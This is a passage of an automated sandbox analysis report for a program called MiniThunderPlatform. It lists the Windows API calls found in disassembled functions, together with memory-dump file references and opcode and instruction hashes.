                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_$?data@?$basic_string@_
                                                                                                                                              • String ID: dl_peer_id.dll
                                                                                                                                              APIs
                                                                                                                                              • CoInitialize.OLE32(?), ref: 1002632A
                                                                                                                                              • CoCreateInstance.COMBASE(1029610C,00000000,00000001,1029611C,00000000), ref: 10026343
                                                                                                                                              • CoUninitialize.COMBASE ref: 100263C9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                              • String ID: 2
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1006D30B
                                                                                                                                              • AtlComPtrAssign.ATL71(1031202C,?), ref: 1006D324
                                                                                                                                              • AtlComPtrAssign.ATL71(-00000004,?), ref: 1006D4BE
                                                                                                                                              • AtlComPtrAssign.ATL71(10312050,00000000), ref: 1006D4F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Assign$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(102FE990), ref: 1001A741
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(102FE990), ref: 1001A750
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(102FE990), ref: 1001A762
                                                                                                                                              • CoUninitialize.COMBASE ref: 1001A867
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$EnterUninitialize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2788927147-0
                                                                                                                                              • Opcode ID: 8e729b5d020b9c341b8290343373c771dc72dec15e9c79dcd0f21f92cbcfa186
                                                                                                                                              • Instruction ID: a93a47c98d324ea1c2e9d4aafc5b0f93b96c97646f3e9d18b6d2ca462710d3db
                                                                                                                                              • Opcode Fuzzy Hash: 8e729b5d020b9c341b8290343373c771dc72dec15e9c79dcd0f21f92cbcfa186
                                                                                                                                              • Instruction Fuzzy Hash: 894105756006119FC710DFA4CC88A9ABBF9FF9A304B514869F48ACB252CB35E986CF50
                                                                                                                                              APIs
                                                                                                                                              • inet_addr.WS2_32(?), ref: 10053BF8
                                                                                                                                              • htons.WS2_32(00000035), ref: 10053C19
                                                                                                                                              • sendto.WS2_32(?,?,00000200,00000000,00000002,00000010), ref: 10053C81
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10053C8D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLasthtonsinet_addrsendto
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4021779738-0
                                                                                                                                              • Opcode ID: 5e3ccc920feff8f7c02c1dd0c182bbf498aa0fe7a04602dc64328b024907f5aa
                                                                                                                                              • Instruction ID: 1d73a20a5aa520a7bd456a333122b8f3afb91ad6db11b15eb719eece4488c90d
                                                                                                                                              • Opcode Fuzzy Hash: 5e3ccc920feff8f7c02c1dd0c182bbf498aa0fe7a04602dc64328b024907f5aa
                                                                                                                                              • Instruction Fuzzy Hash: 24316275900258EBCB24DF98DD89B9EB7B4FB18710F1086ADF409A3281D7349A44CF95
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 1013C711
                                                                                                                                                • Part of subcall function 1013B4D0: RtlEnterCriticalSection.NTDLL(10304E14), ref: 1013B4E4
                                                                                                                                                • Part of subcall function 1013B4D0: RtlLeaveCriticalSection.NTDLL(10304E14), ref: 1013B506
                                                                                                                                                • Part of subcall function 1013B4D0: RtlEnterCriticalSection.NTDLL(10304E14), ref: 1013B558
                                                                                                                                                • Part of subcall function 1013B4D0: RtlLeaveCriticalSection.NTDLL(10304E14), ref: 1013B58F
                                                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000003,?,00000000,000001F4,00000000), ref: 1013C75C
                                                                                                                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 1013C786
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 1013C78D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterEventsLeave$CurrentEnumErrorLastMultipleNetworkThreadWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2709911251-0
                                                                                                                                              • Opcode ID: 97aab0092ca7a0e6a19b14907e14f3349e6517ed9fedf8edb5344890643af950
                                                                                                                                              • Instruction ID: 3491ed0e44893d72367fcc122e297a86910da73ddc2bcf984128865f13bbb1eb
                                                                                                                                              • Opcode Fuzzy Hash: 97aab0092ca7a0e6a19b14907e14f3349e6517ed9fedf8edb5344890643af950
                                                                                                                                              • Instruction Fuzzy Hash: 5721B278A0061D9BDB20DB5AC985BAEB7B9FB58771F100219E816AB380D7386841CF95
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00422F86
                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 00422FA1
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422FB4
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00422FD7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@_U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$CloseEventHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 315019268-0
                                                                                                                                              • Opcode ID: 850aeab4bd0cd195c04fcdd967679d831fca2492b695991db760199d0786dada
                                                                                                                                              • Instruction ID: 61685c3753e301f7780166737cd3b71537efcb652d9752f802e63a37fe3dc0ec
                                                                                                                                              • Opcode Fuzzy Hash: 850aeab4bd0cd195c04fcdd967679d831fca2492b695991db760199d0786dada
                                                                                                                                              • Instruction Fuzzy Hash: A421D6B2D0061C9BCB20EF98D846BCDBB74EB04324F11026AF525A7281DB386E85CBD5
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00002000,?,?,?,?,?,?,?,?,?,?,1024C46F,000000FF), ref: 100A4206
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z.MSVCP71(00000000,?,?,?,?,?,?,?,?,?,?,1024C46F,000000FF), ref: 100A4225
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,1024C46F,000000FF), ref: 100A4232
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A4248
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@?assign@?$basic_string@V01@@V12@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3882326332-0
                                                                                                                                              • Opcode ID: 126c7aa87f93ddd3cbd6979761030c7e9232af65b1e7fa2fc5f9e523106e175b
                                                                                                                                              • Instruction ID: dfdba95a180ee931e1021c189a72f600739d2860004abfc5f05aac12fa9881bc
                                                                                                                                              • Opcode Fuzzy Hash: 126c7aa87f93ddd3cbd6979761030c7e9232af65b1e7fa2fc5f9e523106e175b
                                                                                                                                              • Instruction Fuzzy Hash: 6421B275608750DFD324DF18C888B5AF7E5FBD8B10F418A2DF54687281DB74A908CBA2
                                                                                                                                              APIs
                                                                                                                                              • shutdown.WS2_32(?,00000002), ref: 100487BD
                                                                                                                                              • closesocket.WS2_32(?), ref: 100487C7
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100487DC
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?), ref: 100487F3
                                                                                                                                                • Part of subcall function 1003C630: RtlEnterCriticalSection.NTDLL(?), ref: 1003C658
                                                                                                                                                • Part of subcall function 1003C630: RtlLeaveCriticalSection.NTDLL(?), ref: 1003C6E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@CriticalSection$EnterLeaveclosesocketshutdown
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1776028780-0
                                                                                                                                              • Opcode ID: 9a26d3b98fb180b142f1eaefd6a6d17c64e03b2e1e4a290ae82f1a2136d6e257
                                                                                                                                              • Instruction ID: 6f5583cc3ed725c21356b9cacbafe18c2d0d114fd62810298820310286f1a011
                                                                                                                                              • Opcode Fuzzy Hash: 9a26d3b98fb180b142f1eaefd6a6d17c64e03b2e1e4a290ae82f1a2136d6e257
                                                                                                                                              • Instruction Fuzzy Hash: EEF0C4B4600B009BD630DF39D889E1772E8AB14220F654F2CE466C7691D774E949CB94
                                                                                                                                              APIs
                                                                                                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 10053EC6
                                                                                                                                              • closesocket.WS2_32(?), ref: 10053ED5
                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 10053EEB
                                                                                                                                              • CancelWaitableTimer.KERNEL32(?), ref: 10053F00
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Event$CancelCloseSelectTimerWaitableclosesocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 415103784-0
                                                                                                                                              • Opcode ID: 7ca3501c7964730f19dab297ee30f07a4562e4b6a67d944ddf36c14bc2b2be9d
                                                                                                                                              • Instruction ID: b614680991b70da72320915489743fc1ccdf8c3aa9823a52a48938fb9428302a
                                                                                                                                              • Opcode Fuzzy Hash: 7ca3501c7964730f19dab297ee30f07a4562e4b6a67d944ddf36c14bc2b2be9d
                                                                                                                                              • Instruction Fuzzy Hash: 4DF0E270600B119BC670DF38988DA177BF9AB19731B604B08F4B2D26E0C774EC8A8A50
                                                                                                                                              APIs
                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0042D99E
                                                                                                                                              • ResetEvent.KERNEL32(00000000), ref: 0042D9A8
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00017695,?,00000004,?), ref: 0042D9BC
                                                                                                                                              • ResumeThread.KERNEL32(00000000,?,00000004,?), ref: 0042D9CC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateEventThread$ResetResume
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2675713473-0
                                                                                                                                              APIs
                                                                                                                                              • 754B1540.VERSION(00000000), ref: 1000F8AC
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(00000000,?,00000000,?,00000000,7C3869BF,7C3869BF), ref: 1000F8E8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: B1540
                                                                                                                                              • String ID: 4
                                                                                                                                              • API String ID: 332761040-4088798008
                                                                                                                                              APIs
                                                                                                                                              • swprintf.MSVCR71(?,%hu%c%hu%c%hu%c%hu,?,?,?,?,?,?,?), ref: 0042EAE4
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z.MSVCP71(0132B3A1), ref: 0042EB0D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@_U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@swprintf
                                                                                                                                              • String ID: %hu%c%hu%c%hu%c%hu
                                                                                                                                              • API String ID: 3790506687-2804730362
                                                                                                                                              APIs
                                                                                                                                              • 754B1540.VERSION(00000000,10277FB8,?,?,?,00000000,?,00000000,00000104,?,00000000,?,?,?,?,1001217A), ref: 10010D5D
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(00000000,?,00000000,?,00000000,00000104,?,00000000,?,?,?,?,1001217A,?,?,?), ref: 10010D93
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: B1540
                                                                                                                                              • String ID: 4
                                                                                                                                              • API String ID: 332761040-4088798008
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10059880: RtlEnterCriticalSection.NTDLL ref: 100598A5
                                                                                                                                                • Part of subcall function 10059880: RtlLeaveCriticalSection.NTDLL(1030012C), ref: 100598EB
                                                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000002,?,00000000,000000FF,00000000), ref: 10054DD6
                                                                                                                                              • WSAEnumNetworkEvents.WS2_32(000000FF,?,?), ref: 10054E3C
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10054E88
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEventsSection$EnterEnumErrorLastLeaveMultipleNetworkWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1841062573-0
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL ref: 10058A5E
                                                                                                                                                • Part of subcall function 10058620: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,?,?,?), ref: 10058653
                                                                                                                                              • GetTickCount.KERNEL32 ref: 10058B1A
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(1030012C), ref: 10058B27
                                                                                                                                                • Part of subcall function 10053B90: inet_addr.WS2_32(?), ref: 10053BF8
                                                                                                                                                • Part of subcall function 10053B90: htons.WS2_32(00000035), ref: 10053C19
                                                                                                                                                • Part of subcall function 10053B90: sendto.WS2_32(?,?,00000200,00000000,00000002,00000010), ref: 10053C81
                                                                                                                                                • Part of subcall function 10053B90: WSAGetLastError.WS2_32 ref: 10053C8D
                                                                                                                                                • Part of subcall function 100569C0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,?,?,00000000,10058AC9,?,?,?,?,?,00000000,00000000,?), ref: 100569DA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$CriticalD@1@@std@@D@2@@0@0@SectionV?$basic_string@$??$???$?8CountEnterErrorLastLeaveTickhtonsinet_addrsendto
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 851188910-0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10012004
                                                                                                                                              • PathFileExistsW.SHLWAPI(?,?,10012228,?), ref: 1001200D
                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00000001,?,?,00000104,?,10012228,?), ref: 100120B7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryExistsFileH_prologPath
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00422E23
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422E3E
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00422E5E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
